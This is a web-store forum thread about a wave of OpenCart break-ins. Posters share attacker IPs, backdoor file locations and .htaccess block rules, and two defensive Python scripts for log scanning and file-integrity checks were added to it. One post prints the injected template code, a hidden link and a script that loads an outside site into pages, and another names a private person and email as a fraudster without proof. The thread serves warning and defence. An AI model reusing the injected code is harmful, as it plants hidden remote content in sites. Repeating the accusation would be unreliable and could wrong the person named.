Post by MarketInSG » Sun Dec 23, 2012 4:18 pm

Some hackers with Vietnam IPs have been going around trying to hack sellers' stores. Here's some information that might be useful.

Common IPs used by the hackers:

1.55.210.180
1.54.*.*
113.190.139.39
US Proxy Servers

Files to look out for in your system:

system/helper/helper.php
download/ (yourfilenames[dot]random_characters[dot]php_random_characters)
a modified, trojan-infected index.html in the download folder
download/cp.php

IP ranges recommended to block, as they switch between these IPs in Vietnam:

113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
1.52.0.0/14

Anyway, the 113.x.x.x range has committed a lot of fraud recently.

They also attempt to create an admin user account in the system.


User avatar
Guru Member

Posts

Joined
Wed Nov 16, 2011 11:53 am
Location - Singapore

Post by i2Paq » Sun Dec 23, 2012 4:25 pm

How would one go about blocking these via .htaccess?

This is so others can block them if they're not selling in that area.

Thanks for posting btw.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by MarketInSG » Sun Dec 23, 2012 4:42 pm

Not to be offensive, but I rarely have Vietnamese buyers. You just deny them through your .htaccess file. Entering the IP address/subnet will block off the whole range correctly.


User avatar
Guru Member

Posts

Joined
Wed Nov 16, 2011 11:53 am
Location - Singapore

Post by spikeachu » Sun Dec 23, 2012 7:41 pm

Just a heads up to anyone else affected;

If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.

Wedding Invitations and Stationery by Love2print

Commercial Mods
Product Colours on Category Page
Cardsave Direct Gateway
Clear Cache
Promotional Watermarks on Images
Multiple Category / Product Templates ** Popular **
Log Failed Login Attempts
Display Eligible Coupons with Products
Twitter Feeds

Have I helped you out or saved you some time? Please donate


Active Member

Posts

Joined
Fri Mar 12, 2010 6:31 am

Post by i2Paq » Sun Dec 23, 2012 10:12 pm

JoseManuel wrote: Watch this topic open. http://forum.opencart.com/viewtopic.php?f=10&t=91623

The IPs and nationality of the attacks seen by me are not real.
I move that topic to the Moderators forum to have it analyzed.


Post by trinkaljuneja » Sun Dec 23, 2012 10:17 pm

So we have to change the admin default username/password,

and developers giving admin access to people to show their mods have to disable access to the download tab via the admin permission feature.

Is this all, or am I missing something?

A coder by Hobby and Developer by Profession

Images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6943
Description and images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6978

http://codertj.com


New member

Posts

Joined
Tue Aug 23, 2011 9:08 pm

Post by MarketInSG » Sun Dec 23, 2012 11:08 pm

If your main store is linked to the demo sites, change your database password! Check your error logs in OpenCart and cPanel. Denying the listed IPs is recommended. Monitor traffic accessing suspicious files that shouldn't be on your server. Monitor consistently for a week or two. A waste of time, but better to be safe.



Post by MarketInSG » Sun Dec 23, 2012 11:26 pm

Another IP to note: 178.238.228.92.

The bad thing about these hackers is that they always forget to clear their footprints after they are done. And the bad thing about us is that we never take enough precautions. Best practice is to comment out the block of PHP code that does the uploading. Removing the JavaScript isn't enough. Or just change the folder's permissions.



Post by Demon5 » Mon Jan 14, 2013 11:02 am

i2Paq wrote: How would one go about blocking these via .htaccess?

This so others can block them if they're not selling in that area.

Thanks for posting btw.

order allow,deny
allow from all
deny from 88.131.106.0/24
# Baidu Spider
deny from 180.76.5.0/24
# Baidu
deny from 220.181.108.0/24
deny from 208.83.156.0/24
deny from 113.22.0.0/16
deny from 113.23.0.0/17
deny from 113.52.32.0/19
deny from 113.61.108.0/22
deny from 113.160.0.0/11
deny from 1.52.0.0/14

https://www.lotnllc.com is your one stop shop for all your computer needs!


User avatar
Active Member

Posts

Joined
Sat Jun 19, 2010 4:12 am
Location - Sacramento, CA
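As an added example, not code from any poster in this thread: the Python script below takes the deny ranges from the first post (the same ones in Demon5's .htaccess) together with the backdoor paths listed there, and runs them over a few constructed access log lines in Apache combined format, so that the same activity can be found in a server log rather than only blocked at the door. The log lines, the `/download/catalog.pdf.a8f3.php_q9` file name and the 203.0.113.7 address are made up for the example; the other addresses are the ones reported in this thread (including sigue's later post). One thing it makes visible: three of the six reported attacker IPs fall outside the recommended ranges, so a range block alone does not cover everything the thread reports.

```python
import ipaddress
import re

# Deny ranges recommended in the first post and used in Demon5's .htaccess.
DENY_RANGES = [ipaddress.ip_network(c) for c in (
    "113.22.0.0/16", "113.23.0.0/17", "113.52.32.0/19",
    "113.61.108.0/22", "113.160.0.0/11", "1.52.0.0/14",
)]

# Individual attacker addresses reported in the thread (MarketInSG, sigue).
REPORTED_IPS = ("1.55.210.180", "113.190.139.39", "178.238.228.92",
                "113.166.96.13", "123.21.178.196", "93.139.33.141")

# Backdoor locations named in the first post.
BACKDOOR_PATHS = ("/download/cp.php", "/system/helper/helper.php")

# The first post's naming pattern: a file in download/ that has gained a
# second extension ending in ".php" plus trailing characters.
DOUBLE_EXT = re.compile(r"^/download/[^/]+\.[^/]+\.php[^/]*$")

# Apache combined-format fields used here: client IP, method, path, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; only the addresses in REPORTED_IPS come from the thread.
SAMPLE_LOG = """\
113.190.139.39 - - [23/Dec/2012:15:02:11 +0800] "GET /download/cp.php HTTP/1.1" 200 512
1.55.210.180 - - [23/Dec/2012:15:03:40 +0800] "POST /download/catalog.pdf.a8f3.php_q9 HTTP/1.1" 200 88
203.0.113.7 - - [23/Dec/2012:15:05:02 +0800] "GET /index.php?route=common/home HTTP/1.1" 200 9120
178.238.228.92 - - [23/Dec/2012:15:07:19 +0800] "GET /system/helper/helper.php HTTP/1.1" 404 210
"""


def in_deny_ranges(ip_text):
    """True if the address is inside one of the recommended deny ranges."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in DENY_RANGES)


def uncovered(ips=REPORTED_IPS):
    """Reported addresses that the deny ranges would NOT block."""
    return [ip for ip in ips if not in_deny_ranges(ip)]


def parse(line):
    """Split one combined-format line into (ip, method, path, status) or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return ip, method, path.split("?", 1)[0], int(status)  # drop query string


def classify(ip, path):
    """Reasons a request deserves a look; an empty list means nothing matched."""
    reasons = []
    if in_deny_ranges(ip):
        reasons.append("denied-range")
    if path in BACKDOOR_PATHS:
        reasons.append("backdoor-path")
    if DOUBLE_EXT.match(path):
        reasons.append("double-extension-download")
    return reasons


def scan_log(text):
    """Return (ip, path, reasons) for every flagged line, in log order."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parsed = parse(line)
        if parsed is None:
            hits.append(("?", line, ["unparseable"]))
            continue
        ip, _method, path, _status = parsed
        reasons = classify(ip, path)
        if reasons:
            hits.append((ip, path, reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip:16} {path:42} {', '.join(reasons)}")
    print("reported IPs not covered by the deny ranges:", ", ".join(uncovered()))
```

On the .htaccess itself: `Order`, `Allow` and `Deny` are Apache 2.2 directives. Apache 2.4 only honours them when mod_access_compat is loaded; the native 2.4 form is a `<RequireAll>` block containing `Require all granted` followed by one `Require not ip 113.22.0.0/16` (and so on) per range.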

Post by sigue » Fri Feb 08, 2013 9:30 am

My website was hacked two times in the last two weeks. I cannot log in to the admin panel even after resetting the password in the database via phpMyAdmin. Before that, I did not realize my website had been hacked until I noticed in the user table of the database that the IP address was not mine; when I checked the IP location, it was from Vietnam.
And yesterday someone from Vietnam tried to steal my product by purchasing it at a very low price: the product price is $19.95 but he only paid $0.01 to my PayPal. I don't know how he did it; fortunately the order status is pending, so (maybe) he can't download the files.
Does anyone know which system files could possibly have been hacked to cause me not to be able to log in to admin?

Everyone be careful with these IPs:
113.166.96.13
123.21.178.196
93.139.33.141

and be careful with this name (he registered as Andrea Pots, but I got his name from the PayPal payment details):
Minh Phuc Duong
paypal address: phucduongqb@zing.vn

THEMESOPENCART.COM


New member

Posts

Joined
Sat Aug 14, 2010 12:41 pm

Post by MarketInSG » Fri Feb 08, 2013 10:42 pm

If you provide demo sites, check all of them. Check your download folders for a backdoor program or something of the sort. Happy searching ~



Post by OpenCart Addons » Mon Feb 11, 2013 10:38 am

I noticed the suspicious file about the time this thread was started. Followed a lot of the good steps laid out in the previous posts and haven't had any issues since.


Cheers,

Joel.

Canada's Leading Expert In OpenCart Development & Certified OpenCart Development Partner


User avatar
Active Member

Posts

Joined
Thu Nov 24, 2011 10:51 am
Location - Canada

Post by sigue » Tue Mar 05, 2013 12:55 pm

I found that someone has injected some code into the header.tpl, footer.tpl and content_top.tpl files, and maybe other files, and I found it in (maybe) almost all of my demo theme links; I'm still in the process of checking the files now.
The code was injected/inserted in the notification div in the header.tpl file, so theme makers, please check your demo link files too; maybe it has happened to you as well, but I hope not.

Here is the code that was injected:
<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script>

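As an added example that is not part of sigue's post or of OpenCart itself: the Python script below shows the two checks a theme maker would want after reading the above. It hashes every file under a store directory into a baseline taken while the files are known good, and on a later run reports files that are new, changed or missing; it also searches template text for the three traits of the snippet above (a CSS rule that shrinks an element to 1 px and hides overflow, a dofollow link to another site, and a jQuery `.load()` of a remote URL). The directory tree, template contents and the `example.invalid` host are constructed for the example; `demo()` builds them in a temporary directory, baselines them, then re-creates the injection inside the notification div plus a stray `download/cp.php` and runs the audit.

```python
import hashlib
import os
import re
import tempfile

# Traits of the injection sigue found: CSS that shrinks elements to 1x1 px and
# hides overflow, a dofollow link to another site, and a jQuery .load() that
# pulls remote content into the hidden element.
HIDDEN_CSS = re.compile(
    r"width\s*:\s*1px\s*;\s*height\s*:\s*1px.*?overflow\s*:\s*hidden", re.I | re.S)
REMOTE_LOAD = re.compile(r"\.load\(\s*['\"]https?://", re.I)
DOFOLLOW_LINK = re.compile(r"<a\b[^>]*rel=['\"]dofollow['\"]", re.I)

# Constructed clean templates (not OpenCart's real files).
CLEAN_HEADER = """<!DOCTYPE html>
<html><head><title><?php echo $title; ?></title></head>
<body><div id="header"><div id="notification"></div></div>
"""
CLEAN_FOOTER = '<div id="footer">Powered By OpenCart</div></body></html>\n'

# Constructed stand-in for the snippet in sigue's post; the remote host is a
# placeholder, not the one named in the thread.
INJECTED_SNIPPET = """<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://example.invalid" rel="dofollow">hidden link</a>
<div id="getcms"></div></h1>
<script type="text/javascript">
$(document).ready(function() { $('#getcms').load('http://example.invalid'); });
</script>"""

TEMPLATE_DIR = "catalog/view/theme/default/template/common"


def scan_text(text):
    """Injection traits present in a template's text (empty list = none)."""
    reasons = []
    if HIDDEN_CSS.search(text):
        reasons.append("hidden-1px-css")
    if REMOTE_LOAD.search(text):
        reasons.append("remote-load")
    if DOFOLLOW_LINK.search(text):
        reasons.append("dofollow-link")
    return reasons


def build_baseline(root):
    """Map of relative path -> SHA-256 for every file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as f:
                digests[rel] = hashlib.sha256(f.read()).hexdigest()
    return digests


def audit(root, baseline):
    """Files that are new, changed or missing versus the baseline, or that carry injection traits."""
    current = build_baseline(root)
    report = {}
    for rel, digest in current.items():
        if rel not in baseline:
            status = "new"
        elif baseline[rel] != digest:
            status = "changed"
        else:
            status = "unchanged"
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as f:
            reasons = scan_text(f.read())
        if status != "unchanged" or reasons:
            report[rel] = (status, reasons)
    for rel in baseline:
        if rel not in current:
            report[rel] = ("missing", [])
    return report


def demo():
    """Build a throwaway store tree, baseline it, simulate the compromise, audit it."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, *TEMPLATE_DIR.split("/"))
    os.makedirs(tpl)
    for name, body in (("header.tpl", CLEAN_HEADER), ("footer.tpl", CLEAN_FOOTER)):
        with open(os.path.join(tpl, name), "w", encoding="utf-8") as f:
            f.write(body)
    baseline = build_baseline(root)  # taken while the files are known good

    # Simulate what sigue saw: the snippet lands inside the notification div.
    header = os.path.join(tpl, "header.tpl")
    with open(header, encoding="utf-8") as f:
        text = f.read()
    text = text.replace('<div id="notification"></div>',
                        '<div id="notification">' + INJECTED_SNIPPET + '</div>')
    with open(header, "w", encoding="utf-8") as f:
        f.write(text)
    # ...and a file that was never part of the install appears in download/.
    os.makedirs(os.path.join(root, "download"))
    with open(os.path.join(root, "download", "cp.php"), "w", encoding="utf-8") as f:
        f.write("<?php /* constructed placeholder, not a real backdoor */ ?>\n")
    return audit(root, baseline)


if __name__ == "__main__":
    for rel, (status, reasons) in sorted(demo().items()):
        print(f"{status:8} {rel}  {', '.join(reasons)}")
```

The baseline is only as trustworthy as the moment it was taken, so it belongs with a clean install or a fresh checkout of the theme, stored somewhere the web server cannot write; the trait search is a second net for files that were never baselined at all.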